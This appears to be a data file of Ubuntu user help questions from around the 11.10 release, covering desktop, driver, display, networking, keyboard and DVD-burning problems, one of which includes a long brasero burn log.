75193	how to use gnome_settings_daemon and volume_step ?	http : //www.blograndom.com/blog/2010/02/change-volume-key-step-size-in-ubuntu/ so , to change the effect the volume keys have : press alt+f2 to bring up the “run” box . type in “gconf-editor” and press enter . select “apps > gnome_settings_daemon“ on the right hand side you’ll have a single option named “volume_step“ change the numerical value ( 6 by default ) to a lower one ( 3 seems pretty good )
75197	how can i browse my windows partition ?	i 'd like to get some files from my windows partition , but i ca n't find it . do i need an application to do this , or is there a specific place i need to look ?
75199	how can i customize the gnome shell messaging tray ?	i 'm using gnome shell and have some questions about customization that i think will be cool to try . for example , the messaging tray shows only the icon of the program ( dropbox , google chrome , etc ) , and when you got the mouse hovering over it , it shows the icon and the name ; for example icon + icon name . is it possible to always show only the icon or always show the icon + icon name ? i really think this status bar can have more things , like shortcuts , or something else . is it possible to manually add something to it ?
75202	skype does n't appear in the indicator zone	i recently switched over to ubuntu 11.10 x64 and when i installed skype and launched it i noticed that it does n't appear in the indicator zone . i tried installing skype wrapper so that it could appear in the messaging menu but it does n't show up there either , while skype wrapper tells me that everything is fine . how can i fix this ?
75203	notebook : detect and use currently connected monitor	at first my configuration : i 'm running ubuntu 11.04 , geforce gtx460m . problem : i connect my notebook to 2 different monitors : a ) one at home , via hdmi port , 1920x1200 resolution . b ) one at work , via vga port , 1920x1080 resolution . how can i set xorg.conf to use currently connected monitor with specified resolution and turn off notebook display ? the goal is to plug monitor in , and make it default instead of logging in using built-in display , then changing xorg.conf every time i connect monitor . of course if there is no monitor connected i would like to use built-in display : ) additional information : lspci -nn | grep vga returns : 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation gf106 [ geforce gtx 460m ] [ 10de:0dd1 ] ( rev a1 ) both /var/log/xorg.0.log and libgl_debug=verbose contains lots of information , should i put it on pastebin.com or similar service and paste links here ? ( posting this information here would make my question huge ) .
75204	acer travelmate 220 does n't resume	my computer ( acer travelmate 220 ) likes sleeping so much that i ca n't wake it up . i 'm using ubuntu 11.10 ( installed nov 2011 ) . based on similar questions posted , it seems to have been an issue in the past , but not so much now . i 'm open to any advice . worse case , i can deactivate the sleep modes . we just like running the laptop all day for convenience .
75206	how can i set the unity2d launcher to be always shown ?	is it possible to have the bar on the left side always on top ? i fixed this for unity 3d , but i 'm now using unity 2d and when a window is maximized the launcher is hidden . how can i have always the launcher shown ?
75207	install server edition on machine with no cd/dvd and wifi card	i have set up a `` commodity hardware server '' 6 core amd 16g ram no dvd drive , it has a wifi card that uses the ath9k driver . the wifi card works on the desktop edition without any issues . i am trying to setup a slim server so that i can create some vms on top of it . however the installer fails complaining that there is no cdrom . also the installer does not seem to recognize the wifi card . i am booting from a usb stick . i think my other option is to use xen cloud platform - but i am not sure if xen will support my wifi card . is there a way i can skip the cdrom check and get the right wifi module loaded at boot so that the wifi card is detected ?
75210	thunderbird compose window opening somewhere other than top left corner ?	i 'd like to open my thunderbird compose email window somewhere other than the upper right hand corner . here 's the command i 'm using : /usr/bin/thunderbird -compose i tried using the geometry command , with no luck . any ideas ? thunderbird does remember the size of the window , but not the location that it opens in .
75214	how can i remove un-installed programs from the unity dash menu ?	the unity dash seems to operate independently from the gnome main menu . this is quite annoying . i 've uninstalled many ( wine ) apps , removed their entries from the gnome main menu , but they appear in the unity dash . also , kde apps that i 've removed from the gnome menu still appear in the unity dash . how can i remove these entries ? edit : this question also applies to other un-installed apps .
75217	internet connection sharing connect/disconnect loop	i am trying to share my ubuntu 11.10 internet connection via my wireless to another computer via ethernet . when i try to share them i get this endless `` connection established '' / '' disconnected '' loop . i 've tried updating everything , tried using firestarter , tried everything i knew to . the card is supported for this because i was able to do it back in 11.04 . any help would be nice . : )
75219	screen brightness not adjustable for acer aspire s3	first of all , thank you very much for providing this useful forum . too bad for me , there is no support for the acer aspire s3 yet ( just came out in october ) short description of the problem : i can not adjust the screen brightness . neither compiz nor the fn key combination work . also the fan keeps running on full power . as you can guess , both of these drain my battery . the setup : acer aspire s3 , intel i5 newest generation , intel hd3000 grafic accelerator ( no driver maybe ? ) thanks in advance , kakadu90
75221	how can i repair a ubuntu installation that is missing numerous packages ?	for an unknown reason , my ubuntu workstation decided to do a partial upgrade to oneiric ( i had originally ignored the upgrade ) . after several reboots and running apt-get update apt-get upgrade apt-get dist-upgrade each time , i was finally able to boot my system and have x start gdm as normal . however , i noticed that a lot of packages were missing , including the default theme , firefox , and who knows what else . i 've already lost my whole afternoon , so how can i get my computer back to where it was ? why in the world did this happen ?
75222	how can i start gnome-terminal at a particular directory ?	i 've tried gnome-terminal -x 'cd /path/to/dir' and gnome-terminal -e 'cd /path/to/dir' but both give me errors when the new terminal opens . how do i get a new terminal to start in a specific directory ?
75233	can not connect two monitors	i have an acer aspire desktop with a g-force graphics card . i have two monitors connected , one into the graphics card , and the other into the motherboard , however the monitor connected to the graphics card is never recognized . i have run out of ideas , has any one else had the same problem ? thanks
75238	higher-end notebook with a track-point	my old notebook wont there very long , i feel like . and im looking for a higher-end notebook that will run ubuntu out of the box . unfortunately , a trackpoint mouse is absolutely mandatory for me . i know almost all dell latitudes have one , but which else ( except for the thinkpads ) ? does anyone have more information/experience on which notebooks do have a trackpoint and which dont ?
75242	persistent window placement ?	does anyone know a way of keeping windows in the place you put them , between shutting down and logging back on again , rather where the load themselves ? at the moment whenever i boot up , chrome always leaves a gap where the ( auto-hidden ) launcher is , and other windows load with the toolbar underneath the top-panel , and others with half the window below my screen ? thanks !
75249	static ip - what am i doing wrong ?	the problem here is : when i 'm using dhcp , everything works just fine . i 'm changing /etc/network/interfaces to use static ip like : iface eth0 inet static address 192.168.0.200 netmask 255.255.255.0 network 192.168.0.0 broadcast 192.168.0.255 gateway 192.168.0.1 restarting networking service : sudo /etc/init.d/networking restart after restart , /etc/resolv.conf contains valid router 's ip , tracert shows exactly the same hops , i can access any device within my local network , but when i 'm trying to open a page or connect to the host out of my local network i 'm getting : 'host is not resolved ' . that would be really nice if somebody could point me to my mistake ( s ) . what am i doing wrong ?
75250	how to make alt-tab switch quickly ?	i 've just used recently debian and i 'm using windows 7 , and one thing that really gets on my nerves is the alt-tab feature : to access the second program it 's easy : alt-tab switches instantaneously from the current window to the next one . but if i want to access quickly to the third program i have to wait something like 1/2 second , and that 's really annoying , because as a developper , i 'm always switching between my shell , firefox , and the third one , firebug window . is there something i could do to make alt-switching fast when accessing other windows than the next ? i do n't know , maybe remove an effect ( i 'm currently with the option `` visual effects : normal '' ) .
75257	how to get rid of right-click menu scrolling in firefox under xubuntu ?	despite the fact there is more than enough room on my screen , firefox page-right-click menu usually appears pretty small and offers vertical scrolling to view all the items inside it . some times the effect is like the opposite - a huge free space area is added to the menu after the items . this seems like a problem with xubuntu ( or xfce ) . any experience fixing this ? example ( note the arrow boxes on the top and on the bottom ) :
75263	can i limit mouse click frequency ?	i have a really annoying bug . this is not a bug report but i will report what the bug does to me . occasionally when i middle click , it fires through two or three middle click events . i say occasionally but it comes in clusters . the effect of this purely annoying : a link opens x times in x new tabs i paste something into a terminal x times i middle click to start freescrolling and if ( x % 2 == 0 ) it thinks i did n't want to scroll at all . this bug has haunted me for a long time . right back to 9.04 . since then i 've changed the following : new motherboard ( same cpu ) new mouse ( logitech = > razer ) new graphics card ( still nvidia , still binary driver ) new install of ubuntu ( copy of profile - but issue happens in new guest profile too ) there was a suggestion in the bug ( that has now been deleted for inactivity ) that the nvidia driver could be the cause . but i 'm not here to talk to you all about the bug because we do n't do bug reports here . given the problem just wo n't die for me i thought i 'd ask the many smart minds here if i could work around it . i have one idea : can i put a minimum delay on click events in x/xinput/whatever-mice-use ? if i could put a 50ms barrier in there , i 'm certain it would n't affect me but it would nuke the bug . obviously if you 're familiar with how to fix the bug outright , i also want to hear from you !
75266	can not configure aventail	after this question : missing libraries in ubuntu 11.10 - used to work perfect in ubuntu 11.04 i was able to install the aventail tunnel . but i still have not been able to configure it . i 've gone through the manual , looked all over the place , but i just ca n't make any sense . i 'm using aventail connect 10.5.2.035 , ubuntu 11.10 , with the sun jdk ( aventail complains with open jdk ) . after installing i run the gui using ./startctui after that , i create a new configuration , specify the host name and configuration name , but then when it should fetch available login groups ( after clicking the `` change '' button ) nothing happens ... it just remains there , wating ... the server i 'm trying to connect is up , i know because if i switch to windows xp it works fine . i have no error message to give you . do n't know what log could be usefull . any hint would be greatly appreciated ! btw , this used to work in ubuntu 11.04 . had some problems once in a while , but it used to work .
75269	how can i kill x server and be put into a command prompt ?	is there a way to kil xserver and put me into a command prompt or something ? ( ubuntu 11.10 ) normally killing xserver with sudo stop lightgdm puts me into a bios-esque black screen . where can i type but commands can not be issued ?
75271	why ca n't i create an ad-hoc wireless network using intel 4965agn ?	i 'm running ubuntu 11.10 and i want to create a ad-hoc wireless network . i get that my wireless card ( intel 4965agn ) apparently does not support the ad-hoc mode : $ sudo service network-manager stop network-manager stop/waiting $ sudo ip link set wlan0 down $ sudo iwconfig wlan0 mode ad-hoc error for wireless request `` set mode '' ( 8b06 ) : set failed on device wlan0 ; operation not supported . on windows instead an ad-hoc network works just fine . i checked here but it seems like all available drivers should be embedded already . does anybody have a similar issue ? maybe with another card and there 's some way to activate the functionality . alternatively , could you please suggest some usb wifi adapter that supports ad-hoc ?
75275	switch between applications in the current workspace	with alt+tab i can switch between all my applications . but do you know how to switch between the applications only in the current workspace ? thanks !
75278	how do i get my turtle beach ear force z1 's to work ?	i recently deleted windows and installed ubuntu and now when i try to use skype ( or any other app ) my mic does not want to pick up my voice . i tried fixing the issue in the system settings but when i try to find my mic it is not even listed.does anyone know how i can fix this problem ? any help would be greatly appreciated .
75279	how can i install ubuntu 'alongside ' lubuntu ?	i 'm using lubuntu 11.10 . that 's great , but sometimes i miss ubuntu 's eye-candy . i can install ubuntu 'as a layer ' on lubuntu , so i 'll be able to choose the 'layer ' in the login screen . but doing this will leave typical ubuntu stuff on my lubuntu install as well , which bothers me : i want to keep the lubuntu install clean . i 've booted ubuntu 11.10 from a live usb , and then tried to install it 'alongside ' lubuntu ( so i could choose the right operating system in grub ) . but this option does n't show up . i 'm not an expert at using the advanced installing mode , but this could be the key to get this done . so , my question is : how can i install ubuntu alongside lubuntu , without changing the lubuntu setup ?
75281	how to offer kde , unity and gnome3 desktop login selection ?	we 're looking at deploying 12.04 across the entire enterprise ( several hundred desktops ) . we 've selected kde as the default desktop for all users for the current distribution but we have a policy where people can run unity or gnome3 if they want to . what is the best deployment approach ? is it installing kubuntu and then installing the appropriate gnome packages . if so , then which gnome packages ? or is it installing ubuntu and then getting kde recognized in /usr/share/gnome-session/sessions ? if so , which packages to install ?
75282	how to change default pastie indicator icon ?	how to converted pastie indicator ( color one ) to look same as regular ubuntu indicators ( gray ) . i use ubuntu 11.10 .
75283	does ubuntu one for windows start automatically ?	i have installed ubuntu one on windows 7 . i have checked the `` connect automatically when computer starts '' option in the settings tab , however i can not see any indication that it is running . there is nothing in the processes tab in the task manager until i manually start the application . how can i get it to start as soon as i log on ( preferably without the control panel starting as well ) ? thanks
75284	remove titlebar from maximized terminal window	i 'm using xfce on 10.10 and this is just one of those `` is this even possible '' type questions . when i have the terminal maximized , is it possible to remove the titlebar , including the close , minimize and maximize buttons ? in essence , it 'd be nice to have a fully maximized , transparent terminal overlay . i tend to use terminal text editors alot , and this would be an interesting effect .
75289	can i revert an nvidia driver ?	i tried to update to driver 286.05.09 ( nvidia says these are the latest ) and now i can not log into ubuntu , is it possible to revert back to the recommended ? the pic below is what i see , but i can access the command prompt with ctrl+alt+f2 , so where do i go from here ? is it possible to download the old driver , and install it like i did the newer one ? https : //picasaweb.google.com/lh/photo/ga4fsfq04qwcaflugngs_g ? feat=directlink
75298	how do i get my juju charm officially recognized ?	i 've just completed and tested a charm i made for juju . i 've followed the directions on the juju charms page and pushed the charm to my lp branch . how do i get it into the charms tool or the `` charms store '' ?
75299	problem sharing laptop internet connection	i have tried to share my laptop internet conection to a pc by configuring the eth0 connection of my laptop with `` share with others '' selected . the eth0 connection of the pc is dhcp automatic . it keeps connecting and disconnecting every 2 or 3 seconds . am i doing something wrong ? both computers are running ubuntu .
75300	nvidia gts450 , turn on nvidia drivers = blank screen after boot	i know this is possibly a duplicate of blank screen after installing nvidia restricted driver . but now 11.10 has been released . is this issue near to being resolved ? i 've even uninstalled the nouveau drivers and have installed the unified drivers from nvidia , i get the same . upon reboot the system boots up , i see the root prompt flash up and then it tries to load up unity but then the screen goes blank and the monitor turns off . now on the 7th installation of 11.10 and this time i think i will leave as is . as a side issue , xfce has a 3d drivers option which works for me , as i was just running 11.04 today . why this option is unavailable for ubuntu , i am unsure ... any help appreciated ! thanks
75303	enable [ command ] key to register as something other than just [ ctrl ] ?	i 'm running 10.04lts inside vmware fusion on a mac . the [ command ] key ( aka [ windows ] on many keyboards ) is almost always behaving as if it was [ ctrl ] , even though i done anything explicit to request that behavior . in fact , in system > preferences > keyboard > layouts > options > alt/win key behavior , 'default ' is chosen ( rather than the 'control is mapped to win keys ' option ) . however , choosing other options there do not seem to change the handling of [ command ] , at least not as tested in the system > preference > keyboard shortcuts app . ( no matter what i 've tried , [ command ] -x is always detected as [ ctrl ] -x in that app . ) i 've tried : various options under system > preferences > keyboard > layouts > options > alt/win key behavior toggling the vmware fusion > preferences > kkeyboard & mouse > key mappings setup which claims to map ' [ command ] ' to ' [ windows ] ' , and restarting the vm in each position the xmodmap lines suggested at https : //help.ubuntu.com/community/mappingwindowskey and yet , it 's clear that all ubuntu apps are n't merging [ ctrl ] and [ command ] , because in 'terminal ' , [ shift ] - [ ctrl ] -c will copy , but [ shift ] - [ command ] -c will not . if the [ command ] / [ windows ] key was recognized as anything else ( 'super ' , 'meta ' , 'hyper ' ? i do n't care as long as it 's not 'control ' ) , then i could achieve my real goal ( which happens to be enabling cmd-based cut/copy/paste in pycharm , while leaving ctrl-x/etc available for emacs-like bindings ) . i think any solution which manages to make [ command ] -x appear as something other than [ ctrl ] -x in preferences > keyboard shortcuts will probably do the trick .
75305	why when i retrieve the list of partitions it only gives me one result ?	when i type sudo fdisk -l it just gives me 1 partition ( i have 2 partitions for ubuntu and windows 7 ) . see the full result : disk /dev/sda : 320.1 gb , 320071851520 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625140335 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x2b15104e device boot start end blocks id system /dev/sda1 * 2048 625137663 312567808 7 hpfs/ntfs/exfat i think this is the windows 7 partition . note : i installed ubuntu using the wubi installer for windows .
75306	why i ca n't see my recent documents and recent applications in unity ?	in files and applications lenses do n't displaying recent items . i 've installed ubuntu 64bit and restored backup from my earlier install ( 32bit version ) . maybe i need to set permission to some files ? update : i fixed displaying recent files by removing ~/.local/share/zeitgeist/activity.sqlite , but this did n't fixed displaying recent apps .
75308	how to stop `` aptd '' from maxing out my cpu ?	after running the `` top '' command in the terminal , i see `` aptd '' running which causes the cpu to run at 100 % . if i 'm updating the system , or installing a software , i see it . i only recently noticed it . is there anyway to stop it or tell me what is its function ?
75310	how to install ubuntu onto another drive while running ubuntu	is there a way to install ubuntu onto a separate drive while running ubuntu ? i know i can do it with via cd or usb but i do n't have those at my disposal right now .
75312	unable to burn to dvd-rom discs	i have a problem . the problem is that i could burn a data dvd before but now i ca n't . i 've had ubuntu 10.04 , ubuntu 10.10 , and i have ubuntu 11.10 right now . i 've tried cleaning the dvd-rom , and tried using other software ( k3b , gnome baker , nero linux 4 ) , but i ca n't burn in any of them . i have an asus a6jc and a lg hl-dt-st dvdram gsa-t40n disc drive . brasero-session.log : checking session consistency ( brasero_burn_check_session_consistency brasero-burn.c:1739 ) braseroburnuri called brasero_job_get_action braseroburnuri called brasero_job_get_action braseroburnuri called brasero_job_set_output_size_for_current_track braseroburnuri stopping braseroburnuri called brasero_job_get_action braseroburnuri called brasero_job_get_session_output_size braseroburnuri called brasero_job_get_action braseroburnuri called brasero_job_get_current_track braseroburnuri no burn : // uri found braseroburnuri stopping braserolocaltrack called brasero_job_get_action braserolocaltrack called brasero_job_get_action braserolocaltrack called brasero_job_set_output_size_for_current_track braserolocaltrack stopping braserolocaltrack called brasero_job_get_action braserolocaltrack called brasero_job_get_session_output_size braserolocaltrack called brasero_job_get_action braserolocaltrack called brasero_job_get_current_track braserolocaltrack no remote uris braserolocaltrack stopping braserochecksumfiles called brasero_job_get_output_type braserochecksumfiles called brasero_job_get_current_track braserochecksumfiles called brasero_job_get_action braserochecksumfiles called brasero_job_get_action braserochecksumfiles called brasero_job_set_output_size_for_current_track braserochecksumfiles stopping braserochecksumfiles called brasero_job_get_output_type braserochecksumfiles called brasero_job_get_current_track braserochecksumfiles called brasero_job_get_action braserochecksumfiles called brasero_job_get_session_output_size braserochecksumfiles called brasero_job_get_action braserochecksumfiles called brasero_job_get_action braserochecksumfiles called brasero_job_get_current_track braserochecksumfiles called brasero_job_get_current_track braserochecksumfiles called brasero_job_set_current_action braserochecksumfiles called brasero_job_get_flags braserochecksumfiles called brasero_job_get_action braserochecksumfiles called brasero_job_get_current_track braserochecksumfiles adding graft for checksum file /.checksum.md5 file : ///tmp/brasero_tmp_n5qm4v.md5 braserochecksumfiles called brasero_job_add_track braserochecksumfiles called brasero_job_get_action braserochecksumfiles finished track successfully braserochecksumfiles stopping braserochecksumimage called brasero_job_get_current_track braserochecksumimage called brasero_job_get_action braserochecksumimage called brasero_job_get_flags braserolibburn called brasero_job_get_action braserolibburn creating input braserolibburn called brasero_job_get_action braserolibburn unsupported operation braserolibburn deactivating braserochecksumimage called brasero_job_get_action braserochecksumimage creating input braserochecksumimage called brasero_job_get_action braserochecksumimage called brasero_job_get_fd_in braserochecksumimage deactivating braserolibisofs called brasero_job_get_action braserolibisofs called brasero_job_get_action braserolibisofs called brasero_job_set_current_action braserolibisofs creating volume braserolibisofs called brasero_job_get_data_label braserolibisofs called brasero_job_get_flags braserolibisofs called brasero_job_get_current_track braserolibisofs adding graft disc path = /.checksum.md5 , uri = file : ///tmp/brasero_tmp_n5qm4v.md5 braserolibisofs found parent braserolibisofs adding graft disc path = /the-middle-109-dvdrip-xvid-cz-bedameda.avi , uri = file : ///media/dufala/the % 20middle % 20s01/the-middle-109-dvdrip-xvid-cz-bedameda.avi braserolibisofs found parent braserolibisofs adding graft disc path = /the-middle-114-dvdrip-xvid-cz-bedameda.avi , uri = file : ///media/dufala/the % 20middle % 20s01/the-middle-114-dvdrip-xvid-cz-bedameda.avi braserolibisofs found parent braserolibisofs adding graft disc path = /the-middle-108-dvdrip-xvid-cz-bedameda.avi , uri = file : ///media/dufala/the % 20middle % 20s01/the-middle-108-dvdrip-xvid-cz-bedameda.avi braserolibisofs found parent braserolibisofs adding graft disc path = /the-middle-112-dvdrip-xvid-cz-bedameda.avi , uri = file : ///media/dufala/the % 20middle % 20s01/the-middle-112-dvdrip-xvid-cz-bedameda.avi braserolibisofs found parent braserolibisofs adding graft disc path = /the-middle-113-dvdrip-xvid-cz-bedameda.avi , uri = file : ///media/dufala/the % 20middle % 20s01/the-middle-113-dvdrip-xvid-cz-bedameda.avi braserolibisofs found parent braserolibisofs adding graft disc path = /the-middle-107-dvdrip-xvid-cz-bedameda.avi , uri = file : ///media/dufala/the % 20middle % 20s01/the-middle-107-dvdrip-xvid-cz-bedameda.avi braserolibisofs found parent braserolibisofs adding graft disc path = /the-middle-111-dvdrip-xvid-cz-bedameda.avi , uri = file : ///media/dufala/the % 20middle % 20s01/the-middle-111-dvdrip-xvid-cz-bedameda.avi braserolibisofs found parent braserolibisofs adding graft disc path = /the-middle-106-dvdrip-xvid-cz-bedameda.avi , uri = file : ///media/dufala/the % 20middle % 20s01/the-middle-106-dvdrip-xvid-cz-bedameda.avi braserolibisofs found parent braserolibisofs adding graft disc path = /the-middle-110-dvdrip-xvid-cz-bedameda.avi , uri = file : ///media/dufala/the % 20middle % 20s01/the-middle-110-dvdrip-xvid-cz-bedameda.avi braserolibisofs found parent braserolibisofs adding graft disc path = /the-middle-124-dvdrip-xvid-cz-bedameda.avi , uri = file : ///media/dufala/the % 20middle % 20s01/the-middle-124-dvdrip-xvid-cz-bedameda.avi braserolibisofs found parent braserolibisofs adding graft disc path = /the-middle-104-dvdrip-xvid-cz-bedameda.avi , uri = file : ///media/dufala/the % 20middle % 20s01/the-middle-104-dvdrip-xvid-cz-bedameda.avi braserolibisofs found parent braserolibisofs adding graft disc path = /the-middle-105-dvdrip-xvid-cz-bedameda.avi , uri = file : ///media/dufala/the % 20middle % 20s01/the-middle-105-dvdrip-xvid-cz-bedameda.avi braserolibisofs found parent braserolibisofs adding graft disc path = /the-middle-123-dvdrip-xvid-cz-bedameda.avi , uri = file : ///media/dufala/the % 20middle % 20s01/the-middle-123-dvdrip-xvid-cz-bedameda.avi braserolibisofs found parent braserolibisofs adding graft disc path = /the-middle-118-dvdrip-xvid-cz-bedameda.avi , uri = file : ///media/dufala/the % 20middle % 20s01/the-middle-118-dvdrip-xvid-cz-bedameda.avi braserolibisofs found parent braserolibisofs adding graft disc path = /the-middle-103-dvdrip-xvid-cz-bedameda.avi , uri = file : ///media/dufala/the % 20middle % 20s01/the-middle-103-dvdrip-xvid-cz-bedameda.avi braserolibisofs found parent braserolibisofs adding graft disc path = /the-middle-117-dvdrip-xvid-cz-bedameda.avi , uri = file : ///media/dufala/the % 20middle % 20s01/the-middle-117-dvdrip-xvid-cz-bedameda.avi braserolibisofs found parent braserolibisofs adding graft disc path = /the-middle-119-dvdrip-xvid-cz-bedameda.avi , uri = file : ///media/dufala/the % 20middle % 20s01/the-middle-119-dvdrip-xvid-cz-bedameda.avi braserolibisofs found parent braserolibisofs adding graft disc path = /the-middle-102-dvdrip-xvid-cz-bedameda.avi , uri = file : ///media/dufala/the % 20middle % 20s01/the-middle-102-dvdrip-xvid-cz-bedameda.avi braserolibisofs found parent braserolibisofs adding graft disc path = /the-middle-116-dvdrip-xvid-cz-bedameda.avi , uri = file : ///media/dufala/the % 20middle % 20s01/the-middle-116-dvdrip-xvid-cz-bedameda.avi braserolibisofs found parent braserolibisofs adding graft disc path = /the-middle-121-dvdrip-xvid-cz-bedameda.avi , uri = file : ///media/dufala/the % 20middle % 20s01/the-middle-121-dvdrip-xvid-cz-bedameda.avi braserolibisofs found parent braserolibisofs adding graft disc path = /the-middle-122-dvdrip-xvid-cz-bedameda.avi , uri = file : ///media/dufala/the % 20middle % 20s01/the-middle-122-dvdrip-xvid-cz-bedameda.avi braserolibisofs found parent braserolibisofs adding graft disc path = /the-middle-101-dvdrip-xvid-cz-bedameda.avi , uri = file : ///media/dufala/the % 20middle % 20s01/the-middle-101-dvdrip-xvid-cz-bedameda.avi braserolibisofs found parent braserolibisofs adding graft disc path = /the-middle-115-dvdrip-xvid-cz-bedameda.avi , uri = file : ///media/dufala/the % 20middle % 20s01/the-middle-115-dvdrip-xvid-cz-bedameda.avi braserolibisofs found parent braserolibisofs adding graft disc path = /the-middle-120-dvdrip-xvid-cz-bedameda.avi , uri = file : ///media/dufala/the % 20middle % 20s01/the-middle-120-dvdrip-xvid-cz-bedameda.avi braserolibisofs found parent braserolibisofs called brasero_job_set_output_size_for_current_track braserolibisofs called brasero_job_get_action braserolibisofs finished track successfully braserolibisofs stopping braserochecksumimage called brasero_job_get_current_track braserochecksumimage called brasero_job_get_action braserochecksumimage called brasero_job_get_flags braserolibburn called brasero_job_get_action braserolibburn creating input braserolibburn called brasero_job_get_action braserolibburn called brasero_job_get_device braserolibburn drive ( /dev/sr0 ) init result = 1 braserolibburn called brasero_job_get_flags braserolibburn called brasero_job_get_media braserolibburn called brasero_job_get_fd_in braserolibburn called brasero_job_get_fd_in braserolibburn called brasero_job_get_input_type braserolibburn called brasero_job_get_session_output_size braserolibburn setting multi 0 braserolibburn setting burnproof 1 braserolibburn setting dummy 0 braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserochecksumimage called brasero_job_get_action braserochecksumimage linked to braserolibburn braserochecksumimage creating input braserochecksumimage called brasero_job_get_action braserolibisofs called brasero_job_get_action braserolibisofs linked to braserochecksumimage braserolibisofs called brasero_job_get_action braserochecksumimage called brasero_job_get_action braserochecksumimage called brasero_job_get_current_track braserochecksumimage called brasero_job_get_input_type braserochecksumimage called brasero_job_set_current_action braserochecksumimage called brasero_job_get_fd_in braserochecksumimage starting checksum generation live ( size = 0 ) braserochecksumimage called brasero_job_set_nonblocking braserochecksumimage called brasero_job_get_fd_in braserochecksumimage called brasero_job_get_fd_out braserochecksumimage called brasero_job_get_fd_in braserochecksumimage called brasero_job_get_fd_out braserolibisofs entering thread braserolibisofs called brasero_job_get_fd_out braserolibisofs called brasero_job_set_nonblocking braserolibisofs called brasero_job_get_fd_in braserolibisofs called brasero_job_get_fd_out braserolibisofs called brasero_job_set_current_action braserolibisofs called brasero_job_get_fd_out braserolibisofs writing to pipe braserolibburn burn_drive_convert_fs_adr ( /dev/sr0 ) braserolibburn writing braserolibburn called brasero_job_set_dangerous braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_set_current_action braserolibburn burn_drive_is_enumerable_adr ( /dev/sr0 ) is true braserolibburn called brasero_job_set_current_action braserolibburn async start unit succeeded after 0.1 seconds braserolibburn called brasero_job_set_current_action braserolibburn mmc_set_streaming : end_lba=2298495 , r=4584 , w=11080 braserolibburn called brasero_job_set_current_action braserolibburn allocating buffer via mmap ( ) braserolibburn called brasero_job_set_current_action braserolibburn dvd/bd profile= 11h , obs= 32768 , obs_pad= 1 braserolibburn called brasero_job_set_current_action braserolibburn dvd pre-track 01 : get_nwa ( 0 ) , ret= 1 , d- > nwa= 0 braserolibburn something went wrong braserolibburn called brasero_job_error braserolibburn finished with an error braserolibburn asked to stop because of an error error = 15 message = `` pri zรกpise na disk nastala chyba '' # rough translation : `` when writing to disk error occurred '' braserolibisofs stopping braserolibisofs getting out thread braserolibisofs disconnecting braserolibisofs from braserochecksumimage braserochecksumimage stopping braserochecksumimage disconnecting braserochecksumimage from braserolibburn braserochecksumimage closing connection for braserochecksumimage braserolibburn stopping braserolibburn closing connection for braserolibburn session error : pri zรกpise na disk nastala chyba ( brasero_burn_record brasero-burn.c:2856 ) # rough translation : `` when writing to disk error occurred ''
75313	keyboard resetting on log in	i recently switched to the colemak layout after a fresh install of 11.10 . now , whenever i log in , the keyboard is set to qwerty ( usa ) , which is very confusing . how do i make it so that only colemak is the only layout used ?
75314	ubuntu not showing up on boot menu after wubi installation	i have installed ubuntu to my hard drive using wubi . the installation seemed to be successful ; however , after rebooting my pc i am not brought to a boot menu , and windows just starts normally . when i manually force my computer to a boot menu , ubuntu is not listed .
75318	can not install sound theme in 11.10	i found some tutorials in google search about installing new sound theme for ubuntu , i made a copy sound theme ( folder ) into /usr/share/sounds . it was easy to copy with commands but i can not choose new sound theme in system settings → sound . i 've used gconf-editor to enter new sound theme manually in desktop → gnome → sound , with no success . what 's the problem with this way ? anyone who succeeded in changing into a new sound theme on ubuntu 11.10 , please let me know .
75321	gnome shell extension problem when trying to install themes	i want to install new themes on ubuntu 11.10 , so i went to the internet and followed the instructions to how to install new themes . i 've installed gnome-tweak-tool , the ubuntu shell user extension and everything else that i needed . but after i installed everything and restarted gnome shell , i went into the advanced settings ( gnome tweak tool ) and the shell extensions tab is blank like before the installation . also , in the theme tab , the shell theme option it says could not list shell extensions .
75325	tools to diagnose ubuntu problems	over time a user will have several problems with ubuntu as any other os in the world . what tools and terminal commands exist in ubuntu to help diagnose how the problem occurred and help solve it if it can be done . problems like : ubuntu freezes after x time or when using y app ubuntu rebooted/hibernated/suspended all by itself ubuntu not showing video or video has problems ubuntu not making any sound or sound has problems ubuntu not reading x drive ( pen drive , internal drive , external drive ... ) ubuntu slow ubuntu not working with x hardware when connected ubuntu network problem normally there is a couple of gui tools or terminal commands that ubuntu experts typically mention first to use to do a first diagnosis of this . what gui tools ( in case the problem is not related to video or limits the user from using the gui ) and terminal commands ( in case gui is not working ) can a user use to diagnose and help himself to how to find/fix the problem .
75327	redirection does n't work	i want to put my program 's output into a file . i keyed in the following : ./prog > log 2 > & 1 but there is nothing in the file `` log '' . i am using the ubuntu 11.10 and the default shell is bash . anybody know the cause of this and how i can debug this ?
75328	how to save vmware player library ?	using ubuntu 11.10 and vmware player 4.0 . every time when i open the vmware player , the last library was not there ( it was just blank ) . i can manually add it and it is working then . anyone experienced this ?
75333	why does n't 'w ' or 'who ' command show all logged in users ?	i have ubuntu 11.10 installed on a laptop shared by multiple members of our family . when i execute the 'w ' or 'who ' command from a command line , i only see my account even though there are three users logged in . the funny thing is , i get different results when the command is executed from each of the different accounts on the machine . when i execute the same command from my kid 's account , i see mine and the kids accounts listed . when i execute it from my wife 's account , i see all three accounts : her account , my account , and the kids account . all three accounts are actively logged in , and i 'm just switching between accounts and executing the same command . why the different results ? sorry if this is simple straightforward answer . i searched and could n't find anything . not sure if it matters , but i 'm the only administrator on the laptop .
75334	after sync , music still can not be located on ios 5 device , fix ?	first question of many i am sure . i was able to mount my iphone 4 w/ recently upgraded ios 5 . tried to sync some music w/ banshee , it went onto the iphone , but it wo n't show up in the 'music ' app the device . it is definitely on the phone , in the correct directory . running 11.10 . does anybody have any solutions or advice ?
75336	how do i look up man page references with square brackets ?	sometimes man pages contain references to other information pages , for example everyday git [ 1 ] and gittutorial ( 7 ) are referred to in the man page for git . those with round bracketed numbers refer to other man pages , so for the gittutorial man page i enter : man 7 gittutorial how do i access the info referred to in square brackets ? ( eg : everyday git [ 1 ] )
75343	how can i assign ctrl+alt+delete to shutdown dialog ?	in oneiric ctrl+alt+del key shortcut is for the logout dialog . how can i assign it to the shutdown dialog ?
